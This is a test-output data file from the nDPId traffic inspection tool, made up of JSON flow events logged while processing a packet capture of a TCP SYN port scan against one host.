+00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":863,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 